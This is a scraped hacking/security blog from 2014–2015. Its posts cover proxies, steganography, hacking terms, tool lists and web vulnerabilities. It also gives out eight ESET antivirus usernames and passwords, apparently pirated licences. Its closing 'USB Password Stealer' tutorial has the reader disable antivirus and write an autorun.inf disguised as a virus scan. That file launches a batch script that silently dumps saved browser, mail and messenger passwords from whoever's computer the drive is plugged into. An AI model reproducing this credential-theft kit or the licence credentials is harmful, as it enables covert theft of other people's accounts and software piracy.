.

get our extension
Showing posts with label Secure Yourself. Show all posts
Showing posts with label Secure Yourself. Show all posts

Monday, 24 August 2015

Eset Smart Security 8 with Username and Password

BY Unknown IN , , , , , 23 comments







Username and Passwords:

Username: EAV-0134434043 
Password: 5u77n6x2hm 
Expiry Date: 15.03.2016 

Username: EAV-0139062225 
Password: dmdtpp3crd 
Expiry Date: 10.05.2016 

Username: EAV-0146325437 
Password: k7j7pxckhc 
Expiry Date: 17.11.2015 

Username: EAV-0146325451 
Password: fru6nbn4tr 
Expiry Date: 17.11.2015 

Username: EAV-0146357998 
Password: hx6stscr83 
Expiry Date: 17.11.2015 

Username: EAV-0146359001 
Password: uapbfthvxx 
Expiry Date: 17.11.2015 

Username: EAV-0146359033 
Password: adp8e5jcmm 
Expiry Date: 17.11.2015 

Username: EAV-0146360134 
Password: 5etfehct68 
Expiry Date: 17.11.2015

System requirements
 Smart Security, 2015 edition runs on any system withMicrosoft® Windows® 10, 8.1, 8, 7, Vista, XP, and Microsoft Windows Home Server 2003, 2011.
(Anti-Theft not available for Home Servers). 
Product requires an Internet connection. 

Review
 :
Personally I recommend the ESET Anti-Virus. Its incredible. This is anti virus has 99.99% threat capturing accuracy. It does not affect your settings. It does not detect clean .exe files like other anti virus do. I think this is the best anti-virus in the cyber world. Common Download Eset. This is eset 8 which you call it eset smart security or may be security nod 32 and this is free eset Internet security. Some call it anti virus  eset . This is best security software. So download nod32 now.




Antivirus and Anti-Phishing

Shopping online or checking the latest news?
 Securely browse the Internet with Antivirus. Avoid fake sites with Anti-Phishing.

Anti-Theft

Ever worry about losing your laptop? Track and locate your missing laptop or contact the finder thanks to Anti-Theft. Learn more, see the Anti-Theft Infographics

Personal Firewall

Are you connecting via public Wi-Fi hotspots? Our Personal Firewallwill protect your personal data as you connect wherever you are.


LEADING-EDGE DETECTION TECHNOLOGY FOR YOUR PROTECTION

 NEWBotnet Protection
Brand new technology that  protects against infiltration by botnet malware- preventing spam and network attacks launched from your computer.

MUST-HAVE
Advanced Memory Scanner
Enables improved detection of persistent malware that employs multiple layers of encryption to conceal its activity.

ENHANCED
Exploit Blocker Blocks attacks specifically designed to evade antivirus detection. Protects against attacks on web browsers, PDF readers and more.

Please Rate Me !








 

Tuesday, 28 July 2015

OneKey Recovery Free Download By AOMEI Tech

BY Unknown IN , , , 32 comments




ProductAOMEI OneKey Recovery
Version1.2
Size24.8MB
OS Support Windows 10 New, Windows 8.1/8, Windows 7, Vista, XP (all editions, 32/64bit)
LicenseFreeware
Download AOMEI OneKey Recovery
What is OneKey Recovery?
Well, ever your windows failed to load ? or windows
crashed ? Absolutely right. We see almost every one want a free windows or at very low cost. We get it but the problem is that those windows are clone and pirated. We also avoid to install windows updates released by Microsoft corporation and antivirus because it slows down our computer but safe from threats. There are many things that matters when not installing updates or anti virus. It includes security holes in system and sometimes virus corrupts our operating system. The best way to avoid these threats we must install latest updates and anti virus. By the way we were talking about the pirated windows so, It works fine for a month or may be two, but after due to some virus or spyware, adware etc it crashes and corrupts our windows and we lost access to our system where all our important files stored. We can install windows again but it takes hell a lot of time to install windows and install all necessary software which we used once. Its a hell lengthy and exhaustiveness process. Why not to restore our system in one click without any difficulty. Yes ! you are right, you read almost right. So, I am gonna introduce you with software I was talking about. The OneKey recovery software is designed for you, either you hold a company or just a kid or may be using a personal computer. One more interesting thing is that it is FREE ! Yes ! FREE! You do not need to pay. This is an awesome software developed by AOMEI Technologies. They provide it free of cost. You can use it right away. Its just one click away. Download it now to secure your system and save your time. This is the best software I ever found.
Here is a part of official documentation from AOMEI Tech.
Your computer might fail to boot properly because of system damage and shows a "Boot failure" or "Operating system not found" error. If you never have a system backup image, you have to waste your valuable time to reinstall system and all applications, so system backup is the most frequently one. In order to prevent these from happening, AOMEI OneKey Recovery comes into being.

In addition, a lot of computer manufactures equip their products with a built-in system backup and recovery program, like Lenovo, Dell, HP and Toshiba. However, each of the programs can only be used on their own computer brand. Luckily, as an alternative of these programs, AOMEI OneKey Recovery is available for all kinds of machines, and it protects your system by making a factory recovery partition. AOMEI OneKey Recovery likes Lenovo one key recovery, which is a kind of insurance policy for your computer, but it supports backing up all types of laptops and computers, not just Lenovo laptops.


How to use it when you even lost access to your desktop ??
This FREE program can easily help you to create a factory recovery partition, make system backup and restore in case of your system crashes, and you can use it to restore your computer to its factory default or a previously backed up state by pressing "F11" (default) or "A" key during system startup.


=>Besides pressing A Key , It also supports to press F11 key during system startup to enter into recovery environment.
=>For UEFI boot mode computers, it supports to press F11 key during system startup to enter into recovery environment.
=>By defualt, it will create OneKey recovery environment for computers.

Thank You ! 
Credits : Catherine & Farman
Need Help ? Leave quarries below in comments.

Please Rate This Article To Help Other !

Sunday, 17 August 2014

Secure Your Computer From Hackers/Attackers

BY Unknown IN , No comments





The same advice parents might deliver to young drivers on their first solo journey applies to everyone who wants to navigate safely online :


► "Don't drive in bad neighborhoods."
► "If you don't lock your car, it's vulnerable; if you don't secure your computer, it's vulnerable."
► "Reduce your vulnerability, and you reduce the threat."

Below are some key steps to protecting your computer from intrusion:

► Keep Your Firewall Turned On: A firewall helps protect your computer from hackers who might try to gain access to crash it, delete information, or even steal passwords or other sensitive information. Software firewalls are widely recommended for single computers. The software is prepackaged on some operating systems or can be purchased for individual computers. For multiple networked computers, hardware routers typically provide firewall protection.

► Install or Update Your Antivirus Software: Antivirus software is designed to prevent malicious software programs from embedding on your computer. If it detects malicious code, like a virus or a worm, it works to disarm or remove it. Viruses can infect computers without users' knowledge. Most types of antivirus software can be set up to update automatically.

► Install or Update Your Antispyware Technology: Spyware is just what it sounds like—software that is surreptitiously installed on your computer to let others peer into your activities on the computer. Some spyware collects information about you without your consent or produces unwanted pop-up ads on your web browser. Some operating systems offer free spyware protection, and inexpensive software is readily available for download on the Internet or at your local computer store. Be wary of ads on the Internet offering downloadable antispyware—in some cases these products may be fake and may actually contain spyware or other malicious code. It's like buying groceries—shop where you trust.

► Keep Your Operating System Up to Date: Computer operating systems are periodically updated to stay in tune with technology requirements and to fix security holes. Be sure to install the updates to ensure your computer has the latest protection.

► Be Careful What You Download: Carelessly downloading e-mail attachments can circumvent even the most vigilant anti-virus software. Never open an e-mail attachment from someone you don't know, and be wary of forwarded attachments from people you do know. They may have unwittingly advanced malicious code.

► Turn Off Your Computer: With the growth of high-speed Internet connections, many opt to leave their computers on and ready for action. The downside is that being "always on" renders computers more susceptible. Beyond firewall protection, which is designed to fend off unwanted attacks, turning the computer off effectively severs an attacker's connection—be it spyware or a botnet that employs your computer's resources to reach out to other unwitting users.

Wednesday, 13 August 2014

What Is Computer Viruses ? And How To Avoid It ?

BY Unknown IN , No comments

Here you will learn about what is viruses ? How to avoid viruses? Causes , symptoms and how to remove viruses ?
How to remove and avoid computer viruses ?
A computer virus is malicious software (also known as "malware") that can copy itself and infect other software or files on your computer.
If you suspect your computer has been infected, then several antivirus websites provides step-by-step instructions for removing viruses and other malware.
Fortunately, if you update your computer and use free antivirus software such as AVG, you can help permanently remove unwanted software and prevent installation in the first place.

How do I know if my computer has been infected? After you open and run an infected program or attachment on your computer, you might not realize that you've introduced a virus until you notice something isn't quite right. Here are a few indicators that your computer might be infected:

►Your computer runs more slowly than normal.
►Your computer stops responding or freezes often.
►Your computer crashes and restarts every few minutes.
►Your computer restarts on its own and then fails to run normally.
►Applications on your computer don't work correctly.
►Disks or disk drives are inaccessible.
►You can't print correctly.
►You see unusual error messages.
►You see distorted menus and dialog boxes.

These are common signs of infection—but they might also indicate hardware or software problems that have nothing to do with a virus. Unless you run some kind of Malicious Software Removal Tool and install industry-standard, up-to-date antivirus software on your computer, there is no way to be certain if your computer is infected with a virus or not. Beware of messages warning you that you've sent email that contained a virus. This can indicate that the virus has listed your email address as the sender of tainted email. This does not necessarily mean you have a virus. Some viruses have the ability to forge email addresses. In addition, there is a category of malware called rogue security software that works by causing fake virus alerts to pop up on your computer.

How do I install updates and antivirus software if I can't use my computer? It might be difficult to download tools or update your computer if your computer has a virus. In this case, you can try one of the following options:

►Use another computer to download the tools to a disk.
►Get help through your Antivirus's website support.
►Have your system checked by a Technician

How can I prevent infection by computer viruses?
Nothing can guarantee the security of your computer, but there's a lot you can do to help lower the chances that you'll get a virus.
It's crucial to keep your antivirus software current with the latest updates (usually called definition files) that help the tool identify and remove the latest threats. You can continue to improve your computer's security and decrease the possibility of infection by using a firewall, keeping your computer up to date, maintaining a current antivirus software subscription, and following a few best practices.
Tip: Because no security method is guaranteed, it's important to back up critical files on a regular basis.

Sunday, 10 August 2014

What Is Proxy ???

BY Unknown IN , , 3 comments

Actually What Does Proxy Exactly Means ?
Here Is A Brief Description About Proxy !
Let’s start from general meaning of word 'proxy'. It’s actually an agent/substitute or anybody acting at place of any other. Technically, proxies are used to bypass some firewall restrictions, maintaining anonymity or for many other purposes. Like you can use proxies for accessing social networking sites from your college network which the firewall may restricts.
Let’s understand the common methodology (talking in general terms) You bunk the lecture, requests your friend to speak up your attendance, you get the attendance (in case professor doesn’t' detect).

Another example, when college firewall doesn't allow you to connect to a site (say Facebook), You requests a proxy server to bring the web page from Facebook and serve you, Now the firewall thinks you are dealing with a server other than Facebook and allows you to make a connection(in case firewall doesn't detect ).
Hence you have successfully managed to bypass a firewall. Proxy servers simply act as intermediate between your machine and actual server that you are accessing. Proxy servers are mostly used to maintain anonymity. Suppose you are planning to commit an online crime(although you shouldn’t) you can use a proxy server. The actual webserver doesn’t come to know about you because proxy server is dealing with webserver on your behalf.

Common ways to use proxies:-

(1) Setting in Web Browser
Steps:-
1. First of all log on to whatismyip.com and pen down your current IP.
2. Logon to google.com and search for 'fresh proxies' you will get many sites providing you list of IPs and respective port numbers. It must be like this IP:port. Suppose logon to
http://www.digitalcybersoft.com/ProxyList/fresh-proxy-list.shtml

3. Now copy the IP and port no.
4. In Mozilla Firefox browser, go to Tools->Options->Advanced->Network->Settings. Check the option "Manual Proxy Configuration" , fill IP and port no. You can configure the proxies in any browser.
5. Check out whatismyip.com again, hopefully it must have been changed. Similarly you can configure proxies in other web browsers.

(2)Using softwares and applications:-
You can download many IP hiding softwares. They are easy to use and freely available on internet. They automatically keep changing your IP after a particular interval of time. As an example, 'Ultrasoft' is quite easy to use and very effective but then again there are tons of them out there.

(3) Using websites:- Many websites (e.g. hidemyass.com ) provide free services to hide you IP address. You can directly visit other websites through them. Although the methods, mentioned above are better for long term, this can be used if you urgently need to visit any website without your service provider or anyone else finding out.





Thursday, 7 August 2014

Changing IP In Google Chrome/Configuring Proxy ~ with Screen Shots Step By Step

BY Unknown IN , , No comments

Hi Viewers !
 Today In this tutorial I will show how to change your IP Address easily in Google Chrome Without Any Software.

WHAT WILL YOU NEED:-
You need only fresh IP and PORT NUMBER !
Google it you will find it easily !
And a little mind you need LoL .. :P 


So lets start !
 First i will find my IP ! What is my actual IP .. go to http://whatismyip.com
You will find your IP Address there !
Here is It !

Got It ! My IP Starts with 111....... For security reasons I blurred my IP !
Lets move ahead !

STEP 1:-
Follow Screen Shots !
Go To Settings


STEP 2:-
Click Show advanced Settings..

STEP 3:-
Click Change Proxy Settings 

STEP 4:-
If your on LAN click LAN Settings and In case you are on wireless or dial up networks Click Settings ! check below both screen shots in this step(step 4)


For LAN Users

For Wireless Or Dial Up Users

STEP 5:-
Check Use a proxy server box and enter IP Address in Address box and port number in Port box. The addresses which you recently googled and found one !
So move to next step !
STEP 6:-
I entered IP Address and port number and applied. Do same !
Read Next !
STEP 7:-
Now go to whatismyip.com
you will find this different IP ! Check Below screen shot!
Thats It !

In case you want your original IP back , its easy ! Check screenshot !
Happy Changing IP's , Now you can configure your IP and can apply any IP throughout the world of any country !


Changing IP In Firefox/Configuring Proxy

BY Unknown IN , , No comments



Setting in Web Browser 


Steps:-
1. First of all log on to whatismyip.com and pen down your current IP.
2. Logon to google.com and search for 'fresh proxies' you will get many sites providing you list of IPs and respective port numbers. It must be like this IP:port. Suppose logon to
http://www.digitalcybersoft.com/ProxyList/fresh-proxy-list.shtml

3. Now copy the IP and port no.
4. In Mozilla Firefox browser, go to Tools->Options->Advanced->Network->Settings. Check the option "Manual Proxy Configuration" , fill IP and port no. You can configure the proxies in any browser.
5. Check out whatismyip.com again, hopefully it must have been changed. Similarly you can configure proxies in other web browsers.

Monday, 4 August 2014

Hiding Important Data Behind Images~ Learn Now

BY Unknown IN , , No comments



Steganography is the art and science of hiding messages, Images, Data etc. in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data- security through obscurity. By using this small and neat trick you can hide whatever data you want behind any image of your choice without reducing its quality, In the following tutorial I will show you how you can hide data behind images without using any exotic software.(Good old Winrar or Winzip is sufficient)

1. Create a folder in your C drive and name it as "hide"(Using Root Directory will make this a bit easier).

2.Now you can put anything and everything you want to hide in this folder. Text files,images,executables (ANYTHING).Also, put the image behind which you want to hide the files in the same directory, say "image.jpg".

3.After putting everything you want to hide in the "hide" folder, Right click on it, and click "Add to Hide.rar" or "Add to archive". Our goal is to create a .rar file of the "Hide" folder.
Now you should see the "hide.rar"created in the same directory along with the folder.

4. Now we need to open up command prompt and change the working root directory to your current directory and type the following commands.(First change directory then create the output file).(Remember "C" is capital in "C:\\")

►cd C:\\
►Copy /b image.jpg + hide.rar output.jpg

Here "image.jpg" is the image behind which you want to hide the rar file.
"hide.rar" is the file containing the files to be hidden.
"output.jpg" is the output file that we want. It contains the hidden files, but looks like an image

After executing the following command, we will see an extra image called "output.jpg" created in the same directory.(Note that it's size is size of image.jpg +size of hide.rar)

Now you can delete all the files except "output.jpg". If you double click the file, it opens a normal image. But you can see the hidden files by opening the file with winrar.(Right Click->Open With->Choose WinRar.)

That's It! Now you can send this image to anyone, what others will see is just a regular image but if the recipient knows, s/he will be able to access any secret information privately.This tutorial can be used for any type of files like mp3,wmv,txt etc. since anything can be put into a Rar file.
Although you may want to keep the files to be hidden as small as possible since it wouldn't be very subtle if you try hiding a 15 Gb setup file for the game 'Crysis 3' behind a 5Kb smiley picture.

Sunday, 3 August 2014

Commonly Used Terms/Abbreviations In Cyber World

BY Unknown IN , No comments


When It comes to internet/cyber world, there are number of abbreviations/terms expert used are listed below.
So lets start below are some frequently used words, their brief meaning and acronyms that are commonly used in the world of Hacking. Why? Because humans have gone to the moon but refuse to pick up the remote laying on the other side of the couch. Humans should be defined by laziness before intelligence. Anyways, nobody likes the new guy who needs to have everything explained to him/her. Hacking is no exception. Simply going through these common abbreviations could save you some googling time. There's nothing that you can learn, that you won't ever use. Here we go!




DDoS :- Distributed Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look likeit's coming from multiple ips. Amplification of power in the attack COULD occur




VPS :- Virtual Private Sever




SE :- Social Engineering




HTTP :- Hyper Text Transfer Protocol. The foundation of data communication for the WorldWide Web.




SSH :- Secure Shell, used to connect to Virtual Private Servers.




FTP :- File Transfer Protocol. Usedfor transferring files over an FTP server.




XSS (CSS) :- Cross Site Scripting




Skid :- Script Kid/Script Kiddie




VPN :- Virtual Private Network




Nix :- Unix based operating system, usually referred tohere when referring to DDoS'in




SQL :- Structured Query Language. It usually goes along with a word after it, such as "SQL injection."




FUD :- Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.




LOIC/HOIC :- Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.




Trojan :- A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.




Botnet :- Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.




SQL Injection :- An SQL injection is a method often used to hack SQL databases via a website, and gain admin control of the site.




Root :- Highest permission level on a computer, able to modify anything on the system without restriction.




Warez :- Software piracy




White Hat :- A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)




Rootkit :- A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting insafemode. Ring0 — Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.




Script Kiddie :- A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.




IP Grabber :- A link that grabs someone’s IP when they visit it.




VPS :- The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers’ virtual machines, is in many respects functionally equivalent to a separatephysical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.




Malware :- Software designed todo all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.




Phreak :- Phone Freaks. Hackers who hack cell phones for free calling. Free Long distancecalling. Etc.




Bot :- A piece of malware that connects computer to an attacker commonly using the HTTPor IRC protocol to await malicous instructions.




Shell :- The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter.




DOX :- Personal information about someone on the Internet usually contains real name, address, phone number, SSN, credit card number, etc.




Worm :- Software designed to spread malware with little to no human interaction.




Deface :- A website deface is an attack on a site that changes the appearance of the site or a certain webpage




Keylogger :- A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.




Remote Administration Tool :- It's a general term for a hack that can let someone remotely control your computer with admin access.




Black Hat :- The Bad guy. A Hacker that uses hacking for illegal and unethical purposes.

Common Tools Used For Security/Hacking

BY Unknown IN , , , No comments



MetaSploit - Metasploit is an framework which is used for the hacking of different kinds of applications,operating systems,web applications etc., Metasploit contains various exploits, payloads,modules etc. Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems. As Metasploit is an open source where any one can use it. This framework supports different operating systems like winodws, linux ,mac os x etc., Metasploit is preloaded in the Backtrack linux as there is no need for the backtrack users to install the metasploit again and again. IMHO, Metasploit is the single most powerful and useful tool for a wide variety of hacks. Personally, I like it so much I put it before the list of common tools. Remember this name: "Metasploit". Below are a few more extremely helpfup and common tools, sure to be found in any hacker's computer.




1. Nmap- Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.




2. Wireshark- Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.




3. Metasploit Community edition- Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence.




4. Nikto2- Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.




5. John the Ripper- John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.




6. ettercap- Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.




7. NexPose Community edition- The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features.




8. Ncat- Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.




9. Kismet- Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.




10. w3af- w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.




11. hping- hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.




12. burpsuite- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.




13. THC-Hydra- A very fast network logon cracker which support many different services.




14. sqlmap- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.




15. webscarab- WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned.


Since we are anti-hackers to keep you safe from the latest flaws/attacks/vulnerabilities. the above information are for security/educational purpose only.

Types Of Website Vulnarbilities/Risks

BY Unknown IN , , No comments



Hacking is a growing threat for every business both large and small. Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time in a number of ways.




Hacking Websites is one of the most the common techniques used by BlackHats and also Hacktivists. Whether by DDOSing or Remote File Inclusion Hacking websites offers the Hacking group or indivisual immense exposure, popularity and supposedly fame. There exist numerous ways to take control of or bring down a website. Below I discuss the ten most popular ways they can threaten the security of your site, and your business. These hacks alone account for over 90% of all Website Hacking Techniques: (It's a long one, so make yourselves comfortable)




10. INJECTION ATTACKS

Injection attacks occurs when there are flaws in your SQL Database, libraries, or even the operating system itself. When exceptions are not properly accounted for, say whether password checking isn't rigorous enough- Hackers can use this to obtain access to confidential information by fooling the system. They might gain unauthorized access to private data such as social security numbers, credit card number or other financial data.Injection attacks like SQL injection could have surprisingly commands and methods to access vital databases. SQL uses very simple queries to obtain information requested by users, which makes for a relatively easy hack.




9. CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, URL-“get request”, or file packet is sent to the web browser window bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate even though it has been compromised.

For example, say a website has an XSS script in it, the user might see a popup window asking for their contact information and other sensitive data, even though the actually website may not have anything to do with it.




In another example, the hacker might run commands cause the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session. That is, he may then be able to use this cookie to make the browser think that he is actually his victim and get complete and unrestricted access to his account (A form of identity theft).




8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers might be able to take full advantage. Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).




If a hacker exploits the authentication and session management system, they can assume the user’s identity. (This is similar to the last one - XSS) Ask yourself these questions to find out if a website is vulnerable to a broken authentication and session management attack:




►Are user credentials weak (e.g. stored using hashing or encryption)?

►Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?

►Are session IDs exposed in the URL (e.g. URL rewriting)?

►Are session IDs vulnerable to session fixation attacks?

►Do session IDs timeout and can users log out?




If you have your own website and if the answer to any of these questions is “yes”, your site could be vulnerable to a attack.




7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing. What I mean by that is, the hacker is able to show his own content on a "naive" website. Perhaps an adf.ly link and he could be earning easy money. Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.




Another example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led the user to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker. The website might function normally for the unsuspecting user, but behind the scenes their vital information will be in the hands of the attacker.




6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”. Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or servers. This form of attack can be programmed to spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.




In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC- Yes, it's a thing) temporarily and censored certain content in the United States until the problem was fixed.




5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”. When someone first finds out what exactly it is, they are surprised that it actually works. So was I, but indeed it does work.




It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website. The problem, of course, is that you’re not getting into what you think you’re getting into.




A classic example of a social engineering attack is the popular “Microsoft tech support” scam. This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course. Considering that most computers are indeed quite slow and hang sometimes, this scam is quite well written. Of course, it need not be about money and most often it isn't. Telling someone the name of your first pet might actually be giving them complete access to your account. Surprised? This is actually one of the most common security questions.




4. SYMLINKING – AN INSIDER ATTACK

A symlink (Symbolic Link) is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.(Read that again)




If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.




Meaning, the user might be doing one thing, but another is actually happening. In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt and destroy vital system databases or application files.




3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.




In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account. This is why websites ask you to log out of your account when you’re finished and close the window after logging out – it will expire the session immediately.




In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker. Another identity theft- the hacker confuses the server as to who he actually is.




2. REMOTE CODE EXECUTION ATTACKS

The most devastating in the whole list, a Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.




In this attack, the hacker is basically able to get complete access to the website's server itself. How is that so devastating? This gives him access to every bit and byte of information stored in the database(If the request is coming from the server itself, why would it be denied? That's what it's build for). He may also obtain access to the website's actual code that the browser then shows the user.Meaning, he could totally wipe out the website, mess with the links and buttons, show his own stuff - Sky's the limit. Plus there's usually only one way to recover - Rebuild. But this also makes for quite a complicated attack, details of which aren't suitable to be disclosed here.




1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

The most popular and most widely used,the DDoS attack (Distributed Denial of Services), is where a server or a machine’s services are made unavailable to its users.




The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time. This causes bottlenecking at the server side because the CPU simply runs out of resources.




Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers- DDoSing is highly illegal.


Hence We Are Anti-Hackers, So They Above Info Are For Educational Purpose Only !

USB Password Stealer

BY Unknown IN , , , , No comments



There's a lot of people in the world and even more online accounts. Every security system has a flaw and what we're going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to "recover" saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What's quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to "Show Saved Paswords" in the options menu. We're going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you'll learn in this tutorial. So, with a goal in mind and not a second to spare, let's start right away.




Things you will need (See link below):-




MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.




Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc




IE Passview - IE passview is another small program that helps us view stored passwords in Internet explorer.




Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.




Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I've tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)




So that's that and now we are ready to create a USB password stealer.

Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course ;-)




1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any])




2. Create a new Notepad and write the following text into it:










[autorun]

open=launch.bat

ACTION= Perform a Virus Scan




Save the Notepad and rename it from New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.




3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.)

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt




Save the Notepad and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.




